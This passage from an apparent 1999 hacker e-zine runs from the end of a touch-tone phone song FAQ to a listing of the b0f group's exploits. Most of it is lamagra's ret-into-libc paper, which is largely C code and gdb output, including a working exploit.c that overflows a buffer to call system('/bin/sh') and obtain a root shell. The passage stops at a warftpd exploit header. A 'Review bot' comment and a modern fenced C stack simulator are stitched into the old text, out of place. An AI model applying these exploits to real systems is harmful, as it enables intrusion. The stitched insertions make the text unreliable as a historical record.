      1   1     2    1   6    3 [Numbers to press for the notes. Third
                                 version of the first line for this song.
                                 Tina R. Jones / Keith Maddock is given
                                 credit for this line.]
      Ha ppy  birth day  to  you [Lyrics to this song]
      
      <snipped ALL versions of the NEXT LINE>
      
      1   1     #    9    6     3  2 [Numbers to press for the notes. First
                                      version of the third line. Steve Prior
                                      is given credit for this line.]
                                     [This line is blank because the Craze's 
                                      version of this song was only 2 lines
                                      long.]
      1   1     0    8    5     2  1 [Numbers to press for the notes. Third
                                      version of the third line. Tina R. 
                                      Jones / Keith Maddock is given credit
                                      for this line.]
      Ha ppy  birth day  dear  [na me] [Lyrics to this song.]
      
      In the html version, the entries are also color coded by version.
      
      If you still don't understand, you can find a much easier to read html
      version of this FAQ at http://members.xoom.com/twpyhr0/tttfaq.html.
      
      
      8. Where can I find the most current version of this FAQ?
      
         You can find the most current version of this FAQ at
         http://members.xoom.com/twpyhr0/tttfaq.htm.
      
      
      9. Where can I submit an entry for "The Unofficial Touch Tone Tune
         FAQ"?
      
         Email your entry to jennmartino@my-deja.com.
      
      
      10. What are some examples of touch tone tunes?
      
          See below.  
      
                                                              
      ______________________________________________________________________
      
      (1) America the Beautiful 
          Credits: United Phone Losers (http://www.phonelosers.net)
                   The Craze
      
      5     5   6     1   5    9 
      My  coun try  'tis  of  thee 
      
      0       0    8   0   8  4  
      Sweet  land  of  li ber ty 
      
      8    4    2   5/4 
      of  thee  I  sing 
      
      ______________________________________________________________________
      
      (2) Arabian Tune 
          Credit: Ron Dippold
      
      453 54 4569564 459 9#95458 8987 453 54 
      
      ______________________________________________________________________
      
      (3) A Tisket, A Tasket 
          Credit: The Craze
      
      6   6   4   8   6   4    8    6     6    6   9    6   4 
      A  tis ket  a  tas ket,  a  green  and  yel low  bas ket, 
      
      4    6    6   4   4   6   6    4     8   6    9    6   0     6     4
      I  wrote  a  let ter  to  my  love  and  on  the  way  I  dropped  it
      
      8     6     4   8     6     4    8   6    9    6   0     6     4
      I  dropped  it  I  dropped  it  and  on  the  way  I  dropped  it
      
      8   6   6    4      6     6   4    8    6   9   6    0    6   4  
      A  lit tle  girl  picked  it  up  and  put  it  in  her  poc ket 
      
      8     6   4    8    6   4  
      Her  poc ket  her  poc ket.. 
      
      ______________________________________________________________________
      
      (4) Auld Lang Syne <=
          Credits: Steve Prior (http://users.javanet.com/~sprior/)
                   The Craze
      
      1 1 1 1 3 2 1 2 
      3 2 1 1 3 9 # 
      # 9 3 3 1 2 1 2 
      3 2 1 # # 9 1  
      
      8        4    4    4     6    8    4   8 
      Should  auld  ac quain tance  be  for got 
      
      9    1    4    3     9     # 
      in  days  of  auld  lang  syne 
      
      ______________________________________________________________________
      
      (5) California, Here I Come 
          Credit: The Craze
      
      8   8  8   8    9    8   1 
      Cal i for nia  here  I  come 
      
      3       3      3   3   6    3    4 
      Right  back  where I  star ted  from. 
      
      ______________________________________________________________________
      
      (6) Do Wah Diddy <=
          Credit: UbiOne
      
      5    5   5   5   5   5    6   6   4   5 
      Do  wah  di tty  di tty  dum  di tty  do 
      
      ______________________________________________________________________
      
      (7) Frere Jacques <=
          Credits: Steve Prior (http://users.javanet.com/~sprior/)
                   The Craze
                   Tony / Keith Maddock
                   Keith Maddock
                                        
      1 2 3 1 
      1 2 3 1 
      3 6 9  
      3 6 9 
      9 #/* 9 6 3 1 
      9 #/* 9 6 3 1 
      1 9/1 1 
      1 9/1 1
      
      4 2 6 4, 
      4 2 6 2, 
      6 9 #, 
      6 9 #
      
      4 5 6 4, 
      4 5 6 4, 
      6 9 #, 
      6 9 #, 
      # * # 9 6 4, 
      # * # 9 6 4, 
      4 1 4, 
      4 1 4
      
      ______________________________________________________________________
      
      (8) Happy Birthday <=
          Credits: Steve Prior (http://users.javanet.com/~sprior/)
                   The Craze
                   Tina R. Jones / Keith Maddock
      
      1   1     2    1   6    3 
      4   4     2    4   #    8  
      1   1     2    1   6    3 
      Ha ppy  birth day  to  you 
      
      1   1     2    1   9    6 
      1   1     2    1   9    8 
      1   1     2    1   9    6 
      Ha ppy  birth day  to  you 
      
      1   1     #    9    6     3  2 
      
      1   1     0    8    5     2  1 
      Ha ppy  birth day  dear  [na me] 
      
      9   6     9     3   6    3 
      
      0   0     8     1   2    1 
      Ha ppy  birth  day  to  you 
      
      ______________________________________________________________________
      
      (9) Here We Go 'Round the Mulberry Bush 
          Credit: The Craze
      
      4     4   4      2     2    6    6   2    4 
      Here  we  go  'round  the  mul  ber  ry  bush 
      
      4     8   8  8    8     6    2   4  4    4  
      The  mul ber ry  bush  the  mul ber ry  bush 
      
      4     4   4      2     2    6   6  2    4 
      Here  we  go  'round  the  mul ber ry  bush 
      
      4    8  8   6    8    4    4 
      so  ear ly  in  the  morn ing
       
      ______________________________________________________________________
      
      (10) Hot Crossed Buns 
           Credit: United Phone Losers (http://www.phonelosers.net)
      
      3 2 1 
      3 2 1 
      1 1 1 1 
      2 2 2 2 
      3 2 1 
      
      ______________________________________________________________________
      
      (11) I've Been Working on the Railroad 
           Credit: The Craze
      
      7      2     4    5   4    2    6    4 
      I've  been  work ing  on  the  rail road 
      
      ______________________________________________________________________
      
      (12) Jingle Bells 
           Credits: The Craze
                    Tony / Tina R. Jones / Keith Maddock
      
      6    6     6      6   6     6 
      3    3     3      3   3     3  
      Jin gle  bells,  Jin gle  bells 
      
      6    #    7    8    6  
      3    9    1    2    3 
      Jin gle  all  the  way 
      
      9     9     9   9   9   5    5 
      6     6     6   6   6   3    3 
      Oh,  what  fun  it  is  to  ride  
      
      5   5   5    7    4  5     6 
      3   3   3    2    2  32    9 
      in  a  one horse  o pen  sleigh 
      
      ______________________________________________________________________
      
      (13) London Bridge 
           Credit: United Phone Losers (http://www.phonelosers.net)
      
      6    9     6     8    7    8    6  
      Lon don  bridge  is  fall ing  down 
      
      1     4    5      7    8    9 
      Fall ing  down,  fall ing  down 
      
      6    9     6     8    7    8    6  
      Lon don  bridge  is  fall ing  down 
      
      8    6    0  4 
      my  fair  la dy
       
      ______________________________________________________________________
      
      (14) Louie, Louie <= 
           Credits: Steve Prior (http://users.javanet.com/~sprior/)
      
      1 1 1 
      6 6 
      9 9 9 
      6 6 
      
      ______________________________________________________________________
      
      (15) Mary Had a Little Lamb <=
           Credits: Steve Prior
                    The Craze
                    Recycler / Keith Maddock
                    Keith Maddock
      
      3  2    1   2  3   3     3 
      6  2    4   0  6   6     6 
      3  2    1   2  3   3     3 
      3  2    1   2  3   3     3  
      Ma ry  had  a  li ttle  lamb 
      
      2    2    2      3   9    9  
      2    2    2      6   6    6 
      2    2    2      1   3    3 
      2    2    2      1   3    3  
      lit tle  lamb,  lit tle  lamb 
      
      3  2    1   2  3   3     3 
      6  0    4   0  6   6     6 
      2  1    2   3  3   3     3 
      3  2    1   2  3   3     3 
      Ma ry  had  a  li ttle  lamb 
      
      3      2     2     3    2    1 
      6      8     8     6    8    4 
      2      2     2     3    2    1 
      3      2     2     2    3    2 
      Its  fleece  as  white  as  snow 
      
      ______________________________________________________________________
      
      (16) Mister Sandman 
           Credit: United Phone Losers (http://www.phonelosers.net)
      
      4    2    6    2  
      Mis ter  sand man  
      
      6     6  2   6 
      Bring me a dream 
      
      ______________________________________________________________________
      
      (17) Old McDonald had a Farm 
           Credit: The Craze
      
      6     6    6   7    8   8   7 
      Old  Mac  Don ald  had  a  farm 
      
      9     9     0     0     4  
      E  -  I  -  E  -  I  -  O 
      
      4    6    6     6    7    8   8      7 
      And  on  this  farm  he  had  some  chicks 
      
      9     9     0     0     4  
      E  -  I  -  E  -  I  -  O 
      
      4     4    4      4     4     4   4    4      4      4 
      With  a  chick  chick  here  and  a  chick  chick  there 
      
      4     4    4      4    4    4     4  4     4    4    4      4
      Here  a  chick  there  a  chick  ev' ry  where  a  chick  chick
      
      6     6    6   7    8   8   7 
      Old  Mac  Don ald  had  a  farm 
      
      9     9     0     0     4  
      E  -  I  -  E  -  I  -  O 
      
      ______________________________________________________________________
      
      (18) Olympic Fanfare 
           Credit: Tina R. Jones / Keith Maddock
      
      3 9 9 12 3 1, 
      2 2 2 2 3 2 1 1 2 3 1 2, 
      3 9 9 1 2 3 1, 
      2 2 2 2 3 2 1 1 2 3 2 1
      
      ______________________________________________________________________
      
      (19) Pop Goes the Weasel 
           Credit: The Craze
      
      4    4   8     8    6   8  6    1 
      All  a round  the  mul ber ry  bush 
      
      4     4   4     8      6    0   4 
      The  mon key  chased  the  wea sel 
      
      4     4   4      8       8    6  7  6    1  
      The  mon key  thought  'twas  al-l  in  fun 
      
      5     1     6    0   4  
      Pop  goes  the  wea sel 
      
      ______________________________________________________________________
      
      (20) Rambling Wreck from Georgia Tech 
           Credit: The Craze
      
      6    8   4    4      4 
      I'm  a  ram bling  wreck  
      
      8      6    6    6 
      from  Geor gia  Tech  
      
      8    4   8    6   8   4   0   4  
      and  a  hell  of  an  en gin eer 
      
      ______________________________________________________________________
      
      (21) Ring Around the Rosy
           Credit: United Phone Losers (http://www.phonelosers.net)
      
      8      8     8      6      0  4 
      Ring  a round  the  ros y 
      
      4   8    8     8    6    0   4 
      A  poc ket  full  of  pos ies 
      
      0     4   0     4 
      Ash es  Ash es 
      
      4     0   0      4 
      We  all  fall  down 
      
      ______________________________________________________________________
      
      (22) Row, Row, Row Your Boat 
           Credit: The Craze
      
      4      4     4    8     6 
      Row,  row,  row  your  boat 
      
      6    2    6     9      # 
      gen tly  down  the  stream 
      
      #   #  #     0  0  0     *  *  *    4  4  4 
      Mer ri ly,  Mer ri ly,  Mer ri ly, Mer ri ly, 
      
      6     2    2   1    1 
      Life  is  but  a  dream 
      
      ______________________________________________________________________
      
      (23) Shave and a Haircut 
           Credit: The Craze
      
      9       4   4   2    1     6    6 
      Shave  and  a  hair cut,  two  bits 
      
      ______________________________________________________________________
      
      (24) She'll Be Comin' 'Round the Mountain 
           Credit: The Craze
      
      4       8    #   #      #     #    8    4     4     8    4
      She'll  be  com in'  'round  the  moun tain  when  she comes
      
      ______________________________________________________________________
      
      (25) Strangers in the Night 
           Credit: United Phone Losers (http://www.phonelosers.net)
      
      4      8    8    4     8 
      Stran gers  in  the  night 
      
      4    8    6    8    4 
      Ex chang ing  glan ces 
      
      ______________________________________________________________________
      
      (26) Swannee River 
           Credit: The Craze
      
      3     2    1   3    2    1   0    4  5 
      Way  down  up  on  the  Swan ee  Riv er 
      
      6     8   4  2 
      Far  far  a way 
      
      3         2     1    3    2 
      That's  where  my  heart  is 
      
      1     9   4  5 
      Turn ing  ev er 
      
      6         5     4    2     2     4 
      That's  where  the  old  folks  stay 
      
      ______________________________________________________________________
      
      (27) Twinkle, Twinkle Little Star 
           Credit: United Phone Losers (http://www.phonelosers.net)
      
      1     1    9    9    0   0    9 
      Twin kle  twin kle  lit tle  star 
      
      ______________________________________________________________________
      
      (28) The Butterfly Song 
           Credit: Tony / Keith Maddock
      
      9 6 3, 
      2 3 6 2 1, 
      3 6 9 3 2 3 6 2 3 6 9 3 2 3 6 2, 
      9 6 3, 
      2 3 6 2 1 
      
      ______________________________________________________________________
      
      (29) The Old Grey Mare 
           Credit: The Craze
      
      4     4     4      4      8     6       6      8     6    8   4
      The  old   gray   mare   she   ain't   what   she   used  to  be, 
      
      8       8     4    8    8   4 
      Ain't  what  she  used  to  be 
      
      6       6     8    6    8   4 
      Ain't  what  she  used  to  be 
      
      4     4    4     4     8     6     6     8    6    8   4 
      The  old  gray  mare  she  ain't  what  she  used  to  be,
      
      8  8    8      6    8 4 
      Ma ny  long  years  a go 
      
      ______________________________________________________________________
      
      (30) The Wedding March 
           Credit: United Phone Losers (http://www.phonelosers.net)
      
      1      3    3    3 
      Here comes the bride  
      
      1      9    6    6 
      all dressed in white 
      
      ______________________________________________________________________
      
      (31) Three Blind Mice 
           Credit: The Craze
      
      6        8     4       6      8     4 
      Three  blind  mice,  three  blind  mice 
      
      9     5    5     4     9    5    5     4 
      See  how  they  run,  see  how  they  run 
      
      ______________________________________________________________________
      
      (32) When Johnny Comes Marching Home
           Credit: The Craze
      
      8      4   4     4      4    8    6    8  6  
      When  john ny  comes  march ing  home  a gain 
      
      *    5     *   5 
      Hur rah!  Hur rah! 
      
      8       4     4   4    4   8   6   8     6  
      We'll  give  him  a  heart y  wel come  then 
      
      9    5    #   5 
      Hur rah! Hur rah! 
      
      5     #    #      #      5    9     9      9 
      The  men  will  cheer,  the  boys  will  shout 
      
      5     6   6    6     4     8    8     8 
      The  lad ies  they  will  all  turn  out 
      
      4      8     #    9     6    8     4   4     4      4    0    4
      And  we'll  all  feel  gay  when  John ny  comes  march ing  home
      
      ______________________________________________________________________
      
      (33) Yankee Doodle 
           Credit: The Craze
      
      4      4     2     6     4     6     2 
      Yan kee  doo dle  went  to  town 
      
      4     4    2   6   4   1 
      Rid ing  on  a  po ny 
      
      4      1    5   6   4    6    2    4    4     2    6  4 1  1 
      Stuck  a  feath er  in  his  hat  and called  it  mac a ro ni
      
      ______________________________________________________________________
      
      Credits:
      -------
      
      
      
      FAQ Answers:
      -----------
      
      TELECOM Digest FAQ (http://hyperarchive.lcs.mit.edu/telecom-archives/)
      
      
      
      Touch Tone Tune Entries:
      -----------------------
      
      "The Canonical List of Touch-Tone Phone Songs" by Keith Maddock
      
      "The Push Button Telephone Song Text File" by The Craze
      
      United Phone Losers (http://www.phonelosers.net)
      
      Ron Dippold
      
      Tina R. Jones
      
      Keith Maddock
      
      Steve Prior (http://users.javanet.com/~sprior/)
      
      UbiOne
      
      Recycler
      
      The Craze
      
      Tony
      
      
      
      Ascii Art:
      ---------
      
      Joan Stark
      
      
      @HWA     
      
27.1  Introducing b0f (BufferOverflow Security)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      The following few pieces are from the b0f site
      http://www.b0f.com/
      
      Efnet channel: (Usually occupied during meetings only)
      #b0f
      
      Site is under major construction, if you're interested
      in doing site design, contact slash or anyone in #b0f.
      
      
      Members:
      
      Lamagra: C/C++/PERL/ASM/HTML/PHP coder, unix/win32 security

      Prizm: irix (and general unix) security, rebol and python programming

      Venglin: linux/freebsd security and c/c++/asm programming

      Slash: NT security and SQL programming

      axess: firewalls, unix/NT security, c and shell scripting

      eth0: linux security, c programming

      mordrian: linux security, c/c++/asm/perl programming

      digital monkey: dos32 asm/c, win32/linux security

      sirius: linux security and c programming      
      
      
      Releases: (Many shown here in following sections)
      
      buffer0verfl0w security /home/code

      Programs sorted by date of post.

      warftpd-exploit.c       Kills a Warftpd server using a MKD/CWD overflow
      ftpcat.cpp              Ftpcat is a c++ program that allows users to 
                              get/put files and dirlistings from a ftp-server
                              by lamagra
      man.c                   Redhat 6.1 /usr/bin/man exploit. Gives egid=man 
                              by venglin
      amd.tgz                 Spoofed rpc.amd remote exploit with 3 sets of 
                              shellcode. Gives remote root by lamagra
      proftp_ppc.c            Proftpd pre <=6 remote exploit for linuxppc 
                              by lamagra
      dope_expl.c             Dopewars 1.4.4 remote exploit for server and 
                              client by lamagra
      sysbg.c                 Simple Backdoor. Shell on a port with password
                              support by eth0
      pirchslap.c             Pirch98 ident/fserve daemon DoS attack. by eth0
      standalone.sh           Simple ipchains frontend script to help you 
                              configure ipchains for standalone... by eth0


      buffer0verfl0w security /home/advisories
      
      
      nt-1.txt                 Windows NT Security Check Part I
      nt-2.txt                 Windows NT Security Check Part II
      omega.txt                New way of exploiting buffer overflows: ret-into-libc
      
      
      Hopefully we'll receive some info and background or bio's on the group to 
      further introduce you all to the crew, this was all the info I could accrue
      for this issue since it is a new and emerging group... - Ed
      
      
      @HWA


28.0  New way of exploiting buffer overflows ret-into-libc by lamagra (b0f)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
      
      
      Source: http://www.b0f.com/
      
      
      
      
      
      
                              The OMEGA project finished
                    +=+-+=+-+=+-+=+-+=+-+=+-+=+-+=+-+=
                        By lamagra <lamagra@uglypig.org>

      
      ---[ Flashback
      
      In my previous paper, I explained why and a little bit about how.
      There were some difficulties:
              o sending arguments to the system() call.
                (we fixed this using another program to link the garbage to a shell.)
      
      
      ---[ Examination of a program flow
      
      We take this little example program to examine the flow.
      
      <++> omega/example.c
      void foo(char *bla)
      {
        printf("I got passed %p\n",bla);
      }
      
      void main()
      {
           foo("fubar");
      }
      <--> 
      
      We compile and fire up gdb.
      
      darkstar:~/omega$ gcc example.c -o example
      darkstar:~/omega$ gdb example
      
      GNU gdb 4.17
      Copyright 1998 Free Software Foundation, Inc.
      GDB is free software, covered by the GNU General Public License, and you are
      welcome to change it and/or distribute copies of it under certain conditions.
      Type "show copying" to see the conditions.
      There is absolutely no warranty for GDB.  Type "show warranty" for details.
      This GDB was configured as "i586-slackware-linux"...
      (gdb) disassemble main
      Dump of assembler code for function main:
      0x8048594 <main>:       pushl  %ebp
      0x8048595 <main+1>:     movl   %esp,%ebp
      0x8048597 <main+3>:     pushl  $0x8049099
      0x804859c <main+8>:     call   0x804857c <foo>
      0x80485a1 <main+13>:    addl   $0x4,%esp
      0x80485a4 <main+16>:    movl   %ebp,%esp
      0x80485a6 <main+18>:    popl   %ebp
      0x80485a7 <main+19>:    ret    
      End of assembler dump.
      (gdb) x/5bc 0x8049099
      0x8049099 <_fini+25>:   102 'f' 117 'u' 98 'b'  97 'a'  114 'r'
      (gdb) disassemble foo
      Dump of assembler code for function foo:
      0x804857c <foo>:        pushl  %ebp
      0x804857d <foo+1>:      movl   %esp,%ebp
      0x804857f <foo+3>:      movl   0x8(%ebp),%eax
      0x8048582 <foo+6>:      pushl  %eax
      0x8048583 <foo+7>:      pushl  $0x8049088
      0x8048588 <foo+12>:     call   0x8048400 <printf>
      0x804858d <foo+17>:     addl   $0x8,%esp
      0x8048590 <foo+20>:     movl   %ebp,%esp
      0x8048592 <foo+22>:     popl   %ebp
      0x8048593 <foo+23>:     ret    
      End of assembler dump.
      (gdb) quit
      darkstar:~/omega$
      
      
      We notice the address of our "fubar" string getting pushed on the stack
      at 0x8048597. After that the foo function is called (0x804859c). 
      After its prologue, foo() loads the pushed address into the eax register,
      as we can see at 0x804857f. The address is located at 0x8(%ebp): ebp is
      the frame pointer, set from the stack pointer at 0x804857d, so 0x0(%ebp)
      holds the saved ebp, 0x4(%ebp) the return address and 0x8(%ebp) the
      first argument.
      
      ---[ Implementation
      
      With the previous in mind we write a small test program.
      
      <++> omega/test.c
      /* 
       * A small test program for project "omega"
       * Lamagra <lamagra@uglypig.org>
       */ 
      
      foo(char *bla)
      {
        printf("foo: %p\n",bla);
        printf("foo: %s \n",bla);
      }
      
      
      main()
      {
        char bla[8];
        char *shell = "/bin/sh";
        long addy = 0x41414141;
      
        printf("foo = 0x%x\n",(long)&foo);
        printf("bla = 0x%x\n",(long)&bla);
        printf("shell = 0x%x\n",shell);
        
        *(long *)&bla[0] = addy;   /* buffer */
        *(long *)&bla[4] = addy;   /* buffer */
        *(long *)&bla[8] = addy;   /* saved ebp */
        *(long *)&bla[12] = &foo;  /* saved eip */
        *(long *)&bla[16] = addy;  /* Junk */
        *(long *)&bla[20] = shell; /* address of the arg */
      }
      <-->
      
      The comments explain the use pretty clearly, so read them.
      Afterwards compile and run.
      
      darkstar:~/omega$ gcc test.c -otest
      darkstar:~/omega$ test
      foo = 0x804857c
      bla = 0xbffffb08
      shell = 0x8049111
      foo: 0x8049111
      foo: /bin/sh
      segmentation fault
      darkstar:~/omega$ 
      
      The foo function gets called and its argument is placed correctly.
      But after execution it segfaults, let's debug it and find out why.
      
      darkstar:~/omega$ gdb test
      
      GNU gdb 4.17
      Copyright 1998 Free Software Foundation, Inc.
      GDB is free software, covered by the GNU General Public License, and you are
      welcome to change it and/or distribute copies of it under certain conditions.
      Type "show copying" to see the conditions.
      There is absolutely no warranty for GDB.  Type "show warranty" for details.
      This GDB was configured as "i586-slackware-linux"...
      (gdb) break *foo
      Breakpoint 1 at 0x804857c
      (gdb) run
      Starting program: /tmp/omega/hello 
      foo = 0x804857c
      bla = 0xbffffb10
      shell = 0x8049111
      
      Breakpoint 1, 0x804857c in foo ()
      (gdb) x/10wx 0xbffffb10
      0xbffffb10:     0x41414141      0x41414141      0x41414141      0x0804857c
      0xbffffb20:     0x41414141      0x08049111      0xbffffb44      0x00000000
      0xbffffb30:     0x00000000      0x00000000
      (gdb) c
      Continuing.
      foo: 0x8049111
      foo: /bin/sh
      
      Program received signal SIGSEGV, Segmentation fault.
      0x41414141 in ?? ()
      (gdb) info reg ebp
      ebp            0x41414141       0x41414141
      (gdb) info reg esp
      esp            0xbffffb24       0xbffffb24
      (gdb) quit
      The program is running.  Exit anyway? (y or n) y
      darkstar:~/omega$ 
      
      The dump of buffer "bla" shows our intentions very clearly.
      The segfault happens because the program tries to execute 0x41414141.
      That address is at 0xbffffb20. When returning from foo(), ebp and eip are
      popped from the stack at the location pointed to by esp. 
      If we wanted to fix the segfault, we could put another address in
      there (e.g. exit()), so it has a clean exit.
      
      Apply this patch to fix it (patch test.c test.patch).
      
      <++> omega/test.patch
      --- old.c       Wed Oct  6 18:49:07 1999
      +++ test.c      Wed Oct  6 18:49:25 1999
      @@ -19,6 +19,6 @@
         *(long *)&bla[4] = addr;   /* buffer */
         *(long *)&bla[8] = addr;   /* saved ebp */
         *(long *)&bla[12] = &foo;  /* saved eip */
      -  *(long *)&bla[16] = addr;  /* Junk */
      +  *(long *)&bla[16] = &exit; /* exit() */
         *(long *)&bla[20] = shell; /* address of the arg */
       }
      <-->
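
      Review bot: the removed line and the context lines of this hunk use
      "addr", while the test.c listing above declares and writes "addy", so
      the hunk does not match that file as printed and will not apply;
      regenerate the diff against the listed test.c, or rename the variable
      there first. The added line also takes "&exit", but test.c includes no
      header that declares exit(), so "#include <stdlib.h>" should be added
      in the same patch.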
      
      The same thing can be done for multiple arguments.
      0x8(%ebp)  = arg[1]
      0xc(%ebp)  = arg[2]
      0x10(%ebp) = arg[3]
      and so on.
      
      <++> omega/multiple.c
      #include <stdio.h>
      #include <stdlib.h>
      #include <unistd.h>
      
      main()
      {
        char bla[8];
        char *shell = "/bin/sh";
        long addr = 0x41414141;
      
        printf("bla = 0x%x\n",(long)&bla);
        printf("shell = 0x%x\n",shell);
        
        *(long *)&bla[0]  = addr;   /* buffer */
        *(long *)&bla[4]  = addr;   /* buffer */
        *(long *)&bla[8]  = addr;   /* saved ebp */
        *(long *)&bla[12] = &execl; /* saved eip */
        *(long *)&bla[16] = &exit;  /* exit() */
        *(long *)&bla[20] = shell;  /* arg[1] */
        *(long *)&bla[24] = shell;  /* arg[2] */
        *(long *)&bla[28] = 0x0;    /* arg[3] */
        /* 
         * Executes execl("/bin/sh","/bin/sh",0x0); 
         * On error exit("/bin/sh"); i know weird
         */
      }
      <-->
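
      The frame walk from test.c, its patch and multiple.c, modeled as an added
      C example (not lamagra's code): it replays the prologue and epilogue
      instructions from the disassembly over the overwritten words and
      reproduces the register values of the gdb session. EXIT_, EXECL_ and all
      function names are assumptions; the other constants are the page's.

```c
#include <stdint.h>
#include <stdio.h>

/* Values printed by the page's gdb session for test.c. */
#define BLA    0xbffffb10u  /* &bla[0] */
#define FOO    0x0804857cu  /* &foo */
#define SHELL  0x08049111u  /* address of the "/bin/sh" string */
#define FILL   0x41414141u  /* the addy / addr filler value */
#define ABOVE  0xbffffb44u  /* word gdb shows at 0xbffffb28 */
/* Constructed placeholders, not from the page: stand-ins for &exit, &execl. */
#define EXIT_  0x08048410u
#define EXECL_ 0x08048420u
#define NWORDS 8

struct cpu { uint32_t eip, esp, ebp; };
struct trace {
    uint32_t entered;    /* where main's ret transfers control */
    uint32_t arg[3];     /* 0x8(%ebp), 0xc(%ebp), 0x10(%ebp) in that function */
    struct cpu after;    /* registers once that function has returned */
    uint32_t next_arg1;  /* 0x8(%ebp) as seen by whatever it returned into */
};

static uint32_t mem[NWORDS];  /* the 8 stack words starting at BLA */

/* Map a simulated address to its word; anything outside hits a scratch word. */
static uint32_t *word_at(uint32_t addr)
{
    static uint32_t scratch;
    uint32_t i = (addr - BLA) / 4;
    scratch = 0;
    return (addr >= BLA && i < NWORDS) ? &mem[i] : &scratch;
}

static void push(struct cpu *c, uint32_t v) { c->esp -= 4; *word_at(c->esp) = v; }
static uint32_t pop(struct cpu *c) { uint32_t v = *word_at(c->esp); c->esp += 4; return v; }

/* pushl %ebp ; movl %esp,%ebp */
static void prologue(struct cpu *c) { push(c, c->ebp); c->ebp = c->esp; }

/* movl %ebp,%esp ; popl %ebp ; ret */
static void epilogue(struct cpu *c)
{
    c->esp = c->ebp;
    c->ebp = pop(c);
    c->eip = pop(c);
}

/* Replay main's return and one full call over the given stack words. */
static struct trace walk(const uint32_t words[NWORDS])
{
    struct cpu c = { 0, 0, BLA + 8 };  /* main's %ebp: bla[8] is the saved ebp */
    struct trace t;
    uint32_t i;

    for (i = 0; i < NWORDS; i++)
        mem[i] = words[i];
    epilogue(&c);              /* main returns through the overwritten slot */
    t.entered = c.eip;
    prologue(&c);              /* the entered function builds its frame */
    for (i = 0; i < 3; i++)
        t.arg[i] = *word_at(c.ebp + 8 + 4 * i);
    epilogue(&c);              /* it returns through the next word up */
    t.after = c;
    prologue(&c);              /* frame of whatever it returned into */
    t.next_arg1 = *word_at(c.ebp + 8);
    return t;
}

static struct trace walk_test_c(void)      /* test.c as listed */
{
    const uint32_t w[NWORDS] = { FILL, FILL, FILL, FOO, FILL, SHELL, ABOVE, 0 };
    return walk(w);
}

static struct trace walk_patched(void)     /* test.c with test.patch applied */
{
    const uint32_t w[NWORDS] = { FILL, FILL, FILL, FOO, EXIT_, SHELL, ABOVE, 0 };
    return walk(w);
}

static struct trace walk_multiple_c(void)  /* multiple.c */
{
    const uint32_t w[NWORDS] = { FILL, FILL, FILL, EXECL_, EXIT_, SHELL, SHELL, 0 };
    return walk(w);
}

int main(void)
{
    struct trace t = walk_test_c();
    printf("test.c:     enters 0x%08x arg1 0x%08x, then eip 0x%08x esp 0x%08x\n",
           (unsigned)t.entered, (unsigned)t.arg[0],
           (unsigned)t.after.eip, (unsigned)t.after.esp);
    t = walk_patched();
    printf("patched:    returns to 0x%08x\n", (unsigned)t.after.eip);
    t = walk_multiple_c();
    printf("multiple.c: args 0x%08x 0x%08x 0x%08x, next arg1 0x%08x\n",
           (unsigned)t.arg[0], (unsigned)t.arg[1], (unsigned)t.arg[2],
           (unsigned)t.next_arg1);
    return 0;
}
```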
      
      
      Now we can exploit a buffer overflow in a secure environment.
      What about in the wild?
      
      <++> omega/hole.c
      /* 
       * The hole program.
       * Prints the address of system() in libc and overflows.
       */
      #include <stdlib.h>
      #include <dlfcn.h>
      
      main(int argc, char **argv)
      {
         char buf[8];
         long addr;
         void *handle;
      
         handle = dlopen(NULL,RTLD_LAZY);   
         addr = (long)dlsym(handle,"system");
         printf("System() is at 0x%x\n",addr);
      
         if(argc > 1) strcpy(buf, argv[1]);
      }
      <-->
      
      <++> omega/exploit.c
      /* 
       * The exploit
       * Finds the address of system() in libc.
       * Searches for "/bin/sh" in the neighbourhood of system().
       * (System() uses that string)
       * Lamagra <lamagra@uglypig.org>
       */ 
      
      #include <stdlib.h>
      #include <dlfcn.h>
      
      main(int argc, char **argv)
      {
         int x,size;
         char *buf;
         long addr,shell,exitaddy;
         void *handle;
      
         if(argc != 3){
              printf("Usage %s <bufsize> <program>\n",argv[0]);
              exit(-1);
         }
       
         size = atoi(argv[1])+16;
         if((buf = malloc(size)) == NULL){
              perror("can't allocate memory");
              exit(-1);
         }
      
         handle = dlopen(NULL,RTLD_LAZY);   
         addr = (long)dlsym(handle,"system");
         printf("System() is at 0x%x\n",addr);
      
         if(!(addr & 0xff) || !(addr & 0xff00) || 
            !(addr & 0xff0000) || !(addr & 0xff000000))
         {
              printf("system() contains a '0', sorry!");
              exit(-1);
         }
      
         shell = addr;
         while(memcmp((void*)shell,"/bin/sh",8)) 
              shell++;
      
         printf("\"/bin/sh\" is at 0x%x\n",shell);
         printf("print %s\n",shell);
      
         memset(buf,0x41,size);
         *(long *)&buf[size-16] = 0xbffffbbc;    
         *(long *)&buf[size-12] = addr; 
         *(long *)&buf[size-4]  = shell;    
         
         puts("Executing");
      
         execl(argv[2],argv[2],buf,0x0);
      }
      <-->
      
      darkstar:~/omega$ gcc hole.c -ohole -ldl
      darkstar:~/omega$ gcc omega.c -oomega -ldl
      darkstar:~/omega$ omega 8 vun
      System() is at 0x40043a18
      "/bin/sh" is at 0x40089d26
      print /bin/sh
      Executing
      System() is at 0x40043a18
      bash# 
      
      Looks like it works.
      But as you may have noticed, an extra library is linked for this method.
      That's why it doesn't work on programs that don't have that library
      linked: the location of system() is different.
      
      There are other methods to get the correct address:
      
              o Changing the program to let it print out the address (more or
                less the same)
              
              o Getting the address from the ELF headers. (I think this doesn't
                work on stripped files; solution: recompile)
      
              o Getting the address of atexit() (always available) and
                calculating the address of system(). Check out the included
                program.
      
      ---[ Extra
      
      <++> omega/calc.c
      #include <stdlib.h>
      #include <unistd.h>
      
      main(int argc, char **argv)
      {
        long addy,diff;
      
        if (argc != 2)
        {
              printf("Usage: %s <addy of atexit>\n",argv[0]);
              printf("Get the address with GDB\n\t$ echo x atexit|gdb program\n");
              exit(-1);
        }
      
        addy = strtoul(argv[1],0,0);
        printf("Input = 0x%x\n",addy);
      
        diff = (long)&atexit - (long)&system;
        printf("system() = 0x%x\n",addy - diff + 16); 
      }
      <-->
      ---[ Reference
      
        my previous paper in corezine #2 (http://bounce.to/unah16)
      
      
      ---[EOF
      
      @HWA
      


29.0  warftpd.c exploit code from b0f
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Source: http://www.b0f.com/    
      
      /* coded by eth0 from buffer0verfl0w */
      /* tested by morpha */
